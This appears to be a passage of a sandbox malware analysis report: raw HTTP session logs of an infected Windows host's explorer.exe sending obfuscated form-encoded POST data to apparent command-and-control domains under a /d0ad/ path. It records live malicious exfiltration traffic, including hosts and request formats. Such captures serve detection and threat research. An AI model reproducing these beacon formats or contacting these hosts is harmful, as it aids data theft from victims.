Oct 26, 2022 13:15:54.975265026 CEST	442	OUT	Data Raw: 49 76 4b 4d 76 44 52 78 6a 6d 4d 79 65 31 30 31 4d 38 71 49 63 31 65 78 49 63 33 65 4e 51 53 74 76 46 44 52 76 4f 6d 4d 70 56 56 44 58 57 62 69 58 6a 37 64 66 51 4a 7a 6f 69 43 41 53 35 6e 61 55 5a 65 35 4c 77 54 57 65 57 44 39 41 4c 77 74 5a 6b Data Ascii: IvKMvDRxjmMye101M8qIc1exIc3eNQStvFDRvOmMpVVDXWbiXj7dfQJzoiCAS5naUZe5LwTWeWD9ALwtZkKMFgqLHcfhJWDJeyyKq5(BiT(gMzAIh0Yav9(MX5KAtQjDxy~bKnOFnKyaoMpiCbsoK-WbB6rQj_lbMpC1iZ7A5DcUIb2UAA4_YlS5DysFou3PB2wv7qEEJ4wocxyvB8jLLClal_RKeB~bXWm49Zcp6qwB~rET29R
Oct 26, 2022 13:15:54.975428104 CEST	442	OUT	Data Raw: 73 7a 6f 6f 58 73 38 4b 61 73 71 69 66 30 35 5f 46 52 4f 68 70 6c 42 63 36 43 75 39 64 34 6b 62 55 6a 33 7a 41 53 66 6f 6c 33 31 68 6f 78 6a 65 31 62 6c 76 37 43 71 62 67 50 48 32 52 63 31 30 42 5f 6a 54 54 41 63 48 63 54 34 77 38 39 59 6a 52 4e Data Ascii: szooXs8Kasqif05_FROhplBc6Cu9d4kbUj3zASfol31hoxje1blv7CqbgPH2Rc10B_jTTAcHcT4w89YjRN48Hy13ZaVjiIfo8Gg9uZ1ewWTW8yQh~gz9r5XmgWLGRLuoZziWqJWy8Y45v4oQbBZNutNK~g(1(tpgifSJbwBk16wmZL93OmhVotQV6CvTgvM-sub_yL7vCKshCaN5h_I-EDUgDDbVEJqGOswkcwwiOulLwMwlutf
Oct 26, 2022 13:15:55.167726994 CEST	443	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:15:54 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.11.20	49924	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:01.777151108 CEST	1670	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 28 54 70 44 68 44 46 47 76 4d 61 43 63 43 6e 79 39 6e 38 76 75 74 41 67 42 47 4e 6b 78 77 4a 57 4f 6d 71 47 34 46 35 34 47 35 48 69 64 54 59 71 31 39 62 6d 76 33 65 61 57 55 30 77 79 4f 33 46 57 61 58 4c 33 77 46 52 36 50 77 78 4a 33 4d 36 47 77 68 6a 28 6f 4e 67 36 70 5a 6c 31 6c 69 68 28 2d 79 50 6e 37 6b 74 4e 79 48 32 46 57 79 39 36 30 33 6c 36 62 4f 6c 53 77 30 45 78 6e 6d 59 68 58 53 4a 71 72 49 69 65 6c 55 72 38 49 63 5f 31 78 49 44 48 45 50 77 37 38 45 76 72 53 63 79 46 49 63 48 56 35 45 5f 42 37 6d 53 38 4d 43 47 48 49 45 65 6a 54 6f 5f 78 53 4f 57 6c 68 52 4c 4d 34 6c 44 6d 4c 53 78 58 61 64 4f 49 6e 4e 49 74 72 4c 67 54 64 66 2d 51 38 31 36 42 37 28 50 65 5a 32 30 7a 58 30 4d 73 7a 45 57 65 4f 30 70 49 32 6b 75 71 75 69 34 6a 4c 72 2d 28 6e 69 32 64 70 66 31 75 5f 41 44 62 4f 46 4a 4d 6f 49 74 66 6e 79 43 75 47 67 6d 51 68 6c 65 71 57 46 30 57 6f 4d 5f 59 38 63 4d 31 74 4f 2d 65 55 30 63 38 76 72 4a 61 38 55 42 71 76 66 6b 44 2d 44 6e 37 79 72 31 70 58 68 6e 6b 76 51 64 4f 51 71 43 38 36 49 67 62 5a 48 71 4d 49 65 36 53 47 78 48 51 5a 35 6d 74 30 53 75 37 42 7e 70 74 62 48 72 70 33 71 43 62 4b 4b 65 63 34 67 54 28 70 32 35 74 75 71 50 67 67 59 69 6e 6d 48 4a 52 56 73 5a 50 42 4a 79 43 5a 28 57 44 32 43 62 53 52 33 52 6d 36 37 65 51 72 67 50 32 52 78 7a 28 59 4a 32 6f 50 6c 58 57 54 44 69 4a 79 79 50 75 66 64 55 46 4e 38 41 57 55 63 34 54 72 31 36 51 6e 78 52 35 2d 43 78 67 58 69 76 66 70 7e 6a 6a 71 45 46 79 72 39 68 79 53 6a 6f 4b 47 34 4e 4d 35 44 57 39 74 6c 31 68 52 79 74 6d 77 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=JQcb~T~DYKz4(TpDhDFGvMaCcCny9n8vutAgBGNkxwJWOmqG4F54G5HidTYq19bmv3eaWU0wyO3FWaXL3wFR6PwxJ3M6Gwhj(oNg6pZl1lih(-yPn7ktNyH2FWy9603l6bOlSw0ExnmYhXSJqrIielUr8Ic_1xIDHEPw78EvrScyFIcHV5E_B7mS8MCGHIEejTo_xSOWlhRLM4lDmLSxXadOInNItrLgTdf-Q816B7(PeZ20zX0MszEWeO0pI2kuqui4jLr-(ni2dpf1u_ADbOFJMoItfnyCuGgmQhleqWF0WoM_Y8cM1tO-eU0c8vrJa8UBqvfkD-Dn7yr1pXhnkvQdOQqC86IgbZHqMIe6SGxHQZ5mt0Su7B~ptbHrp3qCbKKec4gT(p25tuqPggYinmHJRVsZPBJyCZ(WD2CbSR3Rm67eQrgP2Rxz(YJ2oPlXWTDiJyyPufdUFN8AWUc4Tr16QnxR5-CxgXivfp~jjqEFyr9hySjoKG4NM5DW9tl1hRytmwg.
Oct 26, 2022 13:20:01.975059986 CEST	1670	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:20:01 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d b3 55 d2 57 b2 b6 d1 87 4a 01 00 37 30 80 5f 23 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 32)N.,(ON,(JMUWJ70_#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.11.20	49925	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:03.983027935 CEST	1672	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 28 54 70 44 68 44 46 47 76 4d 61 43 63 43 6e 79 39 6e 38 76 75 74 41 67 42 47 4e 6b 78 7a 70 57 50 56 69 47 28 55 35 34 48 35 48 69 44 44 59 72 31 39 62 33 76 33 47 57 57 55 49 4b 79 49 37 46 57 74 4c 4c 33 43 74 52 6f 66 77 77 4d 33 4d 34 43 77 67 34 28 6f 52 30 36 70 4e 31 31 56 6d 68 7e 39 71 50 30 34 63 71 46 43 48 77 46 57 79 78 7e 30 32 61 36 62 36 31 53 77 34 45 78 6b 43 59 6e 68 57 4a 6f 59 67 69 54 56 55 73 31 6f 63 67 37 52 49 32 48 45 4c 4f 37 38 45 52 72 54 49 79 46 4b 45 48 57 2d 59 38 50 37 6d 53 78 73 43 42 44 49 49 43 6a 54 31 35 78 54 36 57 6c 6a 52 4c 4e 59 6c 44 77 59 4b 32 42 71 64 49 4d 6e 4e 6c 70 72 48 34 54 63 36 4e 51 35 74 36 42 4c 37 50 66 75 4b 30 79 31 63 4d 6c 7a 45 75 41 4f 31 30 54 6d 6b 79 71 75 53 65 6a 50 62 45 28 6e 47 32 50 64 48 31 34 4b 38 41 57 2d 46 31 50 6f 49 38 56 48 75 65 75 47 77 69 51 68 6c 4f 71 58 42 30 57 59 38 5f 62 2d 30 44 30 64 4f 48 4b 6b 30 7a 79 50 33 58 61 38 49 4a 71 75 33 30 44 34 50 6e 37 53 72 31 73 32 68 6b 71 66 52 56 4d 51 72 46 34 36 4a 6d 62 5a 44 63 4d 4a 61 41 53 79 42 48 57 70 70 6d 7e 55 53 74 72 52 7e 74 37 72 48 78 37 48 71 43 62 4b 58 70 63 34 6b 54 34 62 6d 35 73 5a 75 50 79 44 41 69 6c 6d 48 48 52 56 73 49 50 42 30 45 43 59 47 48 44 32 79 31 53 53 48 52 6e 76 58 65 54 75 4d 41 7a 68 78 32 39 6f 4a 66 73 50 67 4e 57 58 6a 36 4a 32 57 31 76 73 70 55 45 4f 55 41 63 30 63 37 59 72 31 67 41 33 78 39 6f 4f 4f 74 67 58 58 58 66 6f 37 2d 6a 70 45 46 32 4d 4d 39 6d 53 54 67 59 56 49 45 4e 63 36 42 79 38 74 46 7a 55 32 48 30 33 68 4f 6f 62 6b 58 67 39 65 48 59 75 7a 53 59 79 66 6f 4b 30 76 34 73 67 68 61 52 6d 6f 74 30 54 45 4a 64 39 74 53 64 4a 5a 75 6f 6a 78 2d 76 4e 4e 62 66 44 6a 35 66 43 72 35 5a 57 6f 75 76 75 30 32 57 6d 47 49 30 65 4a 2d 62 48 32 77 76 59 4a 70 65 35 6e 52 4a 54 6a 56 61 74 36 4e 71 4a 56 56 79 48 50 59 52 53 4f 41 6f 62 57 72 76 70 75 63 4f 4b 59 46 79 67 31 50 43 70 6a 42 6b 5a 49 71 46 61 7a 37 28 4d 62 6f 6a 38 6a 65 44 77 51 69 4a 5a 49 6f 34 57 53 49 75 76 6c 30 4c 6c 49 69 6e 59 58 32 47 30 32 32 74 69 45 75 35 30 6d 74 68 78 59 5f 58 51 64 68 5a 61 73 50 73 70 6f 37 48 76 6b 39 73 38 33 6c 38 51 56 67 4e 66 28 58 63 66 70 6b 67 2d 74 46 43 57 7e 62 4c 36 71 70 71 34 6a 4e 71 4b 32 34 54 30 51 51 4f 6a 43 42 43 6b 4f 6e 6d 6a 37 76 53 67 41 34 6b 48 28 48 68 73 52 65 47 7a 48 32 6d 70 33 54 6b 75 38 47 38 46 57 4c 55 65 31 33 61 71 59 7a 6b 6a 65 72 54 59 6c 50 30 67 48 74 68 67 28 52 54 47 6f 4f 37 71 38 41 6a 6d 54 4e 44 4c 4e 58 61 4d 64 4d 4c 67 63 55 5a 78 34 76 49 5f 48 67 69 51 4f 44 45 52 41 66 4f 32 45 4a 36 75 68 67 75 66 55 35 63 5f 43 31 77 66 35 58 74 34 44 66 67 4b 71 7a Data Ascii: jXu=JQcb~T~DYKz4(TpDhDFGvMaCcCny9n8vutAgBGNkxzpWPViG(U54H5HiDDYr19b3v3GWWUIKyI7FWtLL3CtRofwwM3M4Cwg4(oR06pN11Vmh~9qP04cqFCHwFWyx~02a6b61Sw4ExkCYnhWJoYgiTVUs1ocg7RI2HELO78ERrTIyFKEHW-Y8P7mSxsCBDIICjT15xT6WljRLNYlDwYK2BqdIMnNlprH4Tc6NQ5t6BL7PfuK0y1cMlzEuAO10TmkyquSejPbE(nG2PdH14K8AW-F1PoI8VHueuGwiQhlOqXB0WY8_b-0D0dOHKk0zyP3Xa8IJqu30D4Pn7Sr1s2hkqfRVMQrF46JmbZDcMJaASyBHWppm~UStrR~t7rHx7HqCbKXpc4kT4bm5sZuPyDAilmHHRVsIPB0ECYGHD2y1SSHRnvXeTuMAzhx29oJfsPgNWXj6J2W1vspUEOUAc0c7Yr1gA3x9oOOtgXXXfo7-jpEF2MM9mSTgYVIENc6By8tFzU2H03hOobkXg9eHYuzSYyfoK0v4sghaRmot0TEJd9tSdJZuojx-vNNbfDj5fCr5ZWouvu02WmGI0eJ-bH2wvYJpe5nRJTjVat6NqJVVyHPYRSOAobWrvpucOKYFyg1PCpjBkZIqFaz7(Mboj8jeDwQiJZIo4WSIuvl0LlIinYX2G022tiEu50mthxY_XQdhZasPspo7Hvk9s83l8QVgNf(Xcfpkg-tFCW~bL6qpq4jNqK24T0QQOjCBCkOnmj7vSgA4kH(HhsReGzH2mp3Tku8G8FWLUe13aqYzkjerTYlP0gHthg(RTGoO7q8AjmTNDLNXaMdMLgcUZx4vI_HgiQODERAfO2EJ6uhgufU5c_C1wf5Xt4DfgKqz
Oct 26, 2022 13:20:03.983100891 CEST	1678	OUT	Data Raw: 72 4c 65 7a 44 71 46 52 5a 36 63 42 45 5f 48 76 7a 67 6f 69 4d 5f 53 62 42 39 61 44 65 66 38 74 6b 78 55 38 48 67 62 39 45 6c 56 68 4a 77 71 61 7e 68 6f 43 61 73 55 68 56 63 36 6a 4a 6b 65 68 33 6a 61 4a 4c 4b 42 48 4a 5a 32 78 68 33 36 42 58 44 Data Ascii: rLezDqFRZ6cBE_HvzgoiM_SbB9aDef8tkxU8Hgb9ElVhJwqa~hoCasUhVc6jJkeh3jaJLKBHJZ2xh36BXDR3HNgnJ6zLFkUIbMadowiYS6PDm_t1suvZpBDyZbPKXylHa_zkxX6CzIAtBIkE1wABENIGVZAKtD723cwq1mCCUWwsbQ9XvV2EkvvTOJQXTBRXcMAlkErq9NB7K6Mw7QdIpsRVMC5s8EJyylEULBYkO6woX96E4wU
Oct 26, 2022 13:20:03.983153105 CEST	1683	OUT	Data Raw: 58 5a 53 41 59 59 33 55 73 61 49 6b 4d 69 32 69 59 5a 48 54 63 47 7a 5f 55 69 6d 49 28 6d 76 54 69 70 7e 72 4c 6d 28 6b 38 74 59 50 49 73 77 33 72 44 6a 61 72 2d 41 6c 61 50 37 77 46 6b 4d 35 72 76 6c 73 49 6d 63 75 30 4b 4b 4b 76 5a 76 33 74 6e Data Ascii: XZSAYY3UsaIkMi2iYZHTcGz_UimI(mvTip~rLm(k8tYPIsw3rDjar-AlaP7wFkM5rvlsImcu0KKKvZv3tnP8TPKIXVi7e69w5TCwvd~IyfoC1KsbhKUBrs1rxkEpKL1h3zukBlQVv-xBxFmdGueRhHqnUcINvfFXpCcdovYRXK8VlwElV_mMFektUb7qOWgOIhIc2oF_R-h6(sIYgNASN32px5HzIsuotnJXfJYnlzRJpidvWTW
Oct 26, 2022 13:20:04.171386003 CEST	1686	OUT	Data Raw: 52 4c 6b 35 35 30 68 37 34 46 77 68 56 61 4d 5a 54 6a 75 51 52 31 56 6c 78 51 38 59 78 38 46 35 45 37 37 4d 42 30 6a 38 67 62 74 74 79 47 45 43 72 46 68 44 6e 4f 38 58 36 52 72 41 76 62 50 43 4f 79 6e 50 75 68 31 39 6d 75 30 5a 51 47 7e 62 67 50 Data Ascii: RLk550h74FwhVaMZTjuQR1VlxQ8Yx8F5E77MB0j8gbttyGECrFhDnO8X6RrAvbPCOynPuh19mu0ZQG~bgPLQ2XlVNioz1yAKsNAfwKC2BYW_SgHEzoENZpekvJoaKK9fU8yoIKLoLop-OL7yHTNzY9zhITnFNEOAO8cMS1qpVSOUfVxvEjaD3VjYY297h8Kwau5E8oSw5HLy42I-xiCAJCN5cJHTaA2eC3mLoEZyjUt9vbQdWG~
Oct 26, 2022 13:20:04.171514988 CEST	1686	IN	HTTP/1.1 500 Internal Server Error Server: nginx Date: Wed, 26 Oct 2022 11:20:04 GMT Content-Type: text/html Content-Length: 186 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:20:04.171744108 CEST	1705	OUT	Data Raw: 67 47 6c 53 64 4a 4f 49 5a 53 4d 4e 74 45 55 50 4e 4c 67 73 32 46 36 67 35 6a 74 62 66 4a 76 6d 68 41 6e 65 45 50 39 43 64 65 79 65 38 61 70 37 36 55 4e 4a 79 5f 4b 35 53 49 30 4b 76 4e 69 6e 33 6a 38 4b 71 34 28 6e 54 59 61 72 39 6a 54 49 66 48 Data Ascii: gGlSdJOIZSMNtEUPNLgs2F6g5jtbfJvmhAneEP9Cdeye8ap76UNJy_K5SI0KvNin3j8Kq4(nTYar9jTIfHhkwhgttTdfoxJQJKq7mipHM-9KRCZOtTSZBvay0HKQoBe1CrBOR58Dqq8dE9gXdoB-hJWoKSS1fkqwD1r4je~4k5~wi7ZsGQa-NRB5SHNqLC0X2EdieT1u3SRIRKL3Ta~bEUx4f8uA8nRhDecArsT0B5StgQwu8N0
Oct 26, 2022 13:20:04.171906948 CEST	1707	OUT	Data Raw: 76 68 4c 31 78 76 65 47 69 70 55 71 61 70 43 62 66 55 6e 74 42 73 4e 32 7e 72 74 51 63 58 34 54 4c 33 52 36 44 50 47 6f 4a 4f 63 68 4a 51 6d 6c 47 63 68 32 4a 38 39 6d 38 46 79 64 48 49 4b 76 74 64 37 56 35 73 41 63 74 6d 64 34 55 5f 39 41 74 35 Data Ascii: vhL1xveGipUqapCbfUntBsN2~rtQcX4TL3R6DPGoJOchJQmlGch2J89m8FydHIKvtd7V5sActmd4U_9At5flrl9Ev_9qqa0pFcwZlgfyrpnRhjaI(y0UIlKxh-0bD63ScO(YJvUDpM5YjGh3NsjoE7CJmESSrb7zt9C2Q2e_IyJdv3cfg24trmDknRy4Tt4BjhgGkWE_7W7JvxIXD2rDkEnAVkTTd8jiwF3dyV8dIaRTzOoO5-6
Oct 26, 2022 13:20:04.212227106 CEST	1709	OUT	Data Raw: 5a 6b 56 79 4c 34 7a 32 71 63 7e 43 61 4e 4f 31 53 48 31 4f 30 78 46 42 77 6e 61 36 75 51 6e 49 4e 6d 78 5f 36 55 73 41 69 5f 38 44 67 30 4d 51 70 4a 36 62 4f 6f 71 71 51 4f 30 6d 45 7a 37 32 73 72 7e 39 62 62 43 6a 38 45 4d 4a 51 32 78 4c 65 76 Data Ascii: ZkVyL4z2qc~CaNO1SH1O0xFBwna6uQnINmx_6UsAi_8Dg0MQpJ6bOoqqQO0mEz72sr~9bbCj8EMJQ2xLevxGPcCIBJj1TUJNMp9fJNfvdg2tOWLn8SiFXIU5yXtG6yXY8mqAAi2LJmOYogZZPYLFcsuZ843IhW(kNyi6dQrctMqvdRxOvdsQOlsfDonrvS~WmyCG(Twa(QAnkrgMbrpRkSwcGd3oSsmBkUPzqu687auOiHJLumT
Oct 26, 2022 13:20:04.360004902 CEST	1718	OUT	Data Raw: 79 64 36 78 4b 31 42 6e 38 46 6b 55 47 45 38 51 44 45 33 39 30 33 4b 50 66 52 57 44 6a 51 46 61 33 50 7a 35 7a 61 47 6e 33 68 46 31 4e 75 35 76 4a 62 31 55 48 50 32 79 6d 42 46 5a 50 6b 4b 76 71 72 38 68 6e 48 4d 7a 72 78 6a 52 44 43 53 2d 68 49 Data Ascii: yd6xK1Bn8FkUGE8QDE3903KPfRWDjQFa3Pz5zaGn3hF1Nu5vJb1UHP2ymBFZPkKvqr8hnHMzrxjRDCS-hISMxW3ozAREfwhYfhYrwTb1pFB5cDXp1neWXNH1~QJdtohoPGZK1NKR8Qhph9LbEsiqShthYflPjJ(99lhLdqjAini7agM2BioRYbitCOiVnjkftF(lvqFR~_17x_81RmZidIFJCn50unbAtL(opSzlMJHwCoFBa0C
Oct 26, 2022 13:20:04.360130072 CEST	1723	OUT	Data Raw: 75 5a 62 57 74 59 51 71 30 4e 55 7a 69 74 54 70 62 67 6b 64 32 71 71 70 33 55 39 43 65 6e 6c 58 62 44 47 7a 54 4e 47 55 76 47 57 2d 6d 52 6a 50 6f 4e 4e 43 57 70 4e 74 57 59 54 4a 71 32 6b 45 47 6c 57 6b 6c 38 44 53 68 36 6e 75 5a 51 4a 59 51 41 Data Ascii: uZbWtYQq0NUzitTpbgkd2qqp3U9CenlXbDGzTNGUvGW-mRjPoNNCWpNtWYTJq2kEGlWkl8DSh6nuZQJYQAqLMQKCOb8KRlRpejrxOguvwfzDpfTEPPmTCegDUhI5fMwQZPboYePohQ47HAWketh7gwIQ86Om6iA-z2jVGbB5(eDTQ_bpuPIZVQW1tfNOW9aFViW3DYMrVU(2GJ5T2_pvV_voBw5O2Wla3523ZnkVdS(MoiMPsSu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.11.20	49926	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:06.198930979 CEST	1724	OUT	GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.budgaugh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:20:06.401736975 CEST	1725	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:20:06 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Data Raw: 32 33 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 23<script>location.href="/";</script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.11.20	49927	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:11.768132925 CEST	1726	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 6d 58 53 36 47 75 68 36 52 55 64 4f 4a 58 49 68 4d 34 6f 34 50 51 34 39 51 75 65 69 38 4c 79 45 4f 4b 38 78 55 51 48 44 65 6e 32 38 61 41 6e 42 4b 49 59 5a 77 5a 50 68 68 69 48 67 77 7a 37 67 53 4b 53 7a 70 37 35 4a 69 72 70 72 66 59 76 50 42 54 51 59 31 4b 6c 64 72 38 6b 4b 75 46 37 35 6b 38 4c 34 6b 39 4a 31 39 65 65 37 58 6c 4b 63 6a 56 6b 42 56 6c 44 34 4d 37 34 72 7a 54 5a 6f 36 62 43 44 62 64 34 4f 50 4a 7a 64 38 59 5a 31 36 42 69 66 48 6f 37 4a 66 37 67 63 34 54 7e 6c 6b 6c 52 4b 49 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=binxmIkcuJsBmXS6Guh6RUdOJXIhM4o4PQ49Quei8LyEOK8xUQHDen28aAnBKIYZwZPhhiHgwz7gSKSzp75JirprfYvPBTQY1Kldr8kKuF75k8L4k9J19ee7XlKcjVkBVlD4M74rzTZo6bCDbd4OPJzd8YZ16BifHo7Jf7gc4T~lklRKIQ).
Oct 26, 2022 13:20:12.126378059 CEST	1726	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:20:11 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.11.20	49928	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:14.058480024 CEST	1727	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 70 57 43 36 42 50 68 36 57 30 64 42 46 33 49 68 46 59 6f 30 50 51 30 39 51 73 79 79 28 35 57 45 4f 71 4d 78 56 52 48 44 66 6e 32 38 53 67 6e 4f 4f 49 5a 62 77 5a 4c 44 68 67 54 67 77 7a 48 67 54 39 53 7a 6f 4c 35 4f 36 37 70 6f 58 34 76 4f 51 6a 51 4f 31 4b 70 42 72 39 77 4b 75 31 6e 35 6a 2d 54 34 7a 34 70 79 33 75 65 39 52 6c 4b 66 74 46 6b 31 56 6c 4f 48 4d 2d 4d 37 7a 67 46 6f 37 37 69 44 61 64 34 4e 59 4a 7a 47 7e 59 59 2d 71 78 4b 50 4b 4c 50 48 42 5a 55 41 31 52 79 7a 6c 78 4d 76 58 53 44 31 4e 49 43 73 42 44 7a 30 33 4c 4e 6a 59 55 58 43 4b 61 49 61 79 43 56 36 52 49 51 66 36 6d 68 38 74 48 50 37 6f 70 6d 50 64 39 70 77 4d 61 73 31 43 62 6c 36 74 38 43 64 4f 71 56 30 78 50 43 54 56 53 49 4e 42 48 71 53 7a 42 49 54 77 56 34 58 6f 57 65 72 73 56 58 44 31 64 57 6d 54 51 32 72 6e 54 63 79 42 47 45 2d 58 64 6f 42 62 72 6a 37 32 72 73 2d 5a 69 35 6c 51 4f 74 4d 6b 4c 32 59 52 62 35 49 31 6b 35 32 78 63 34 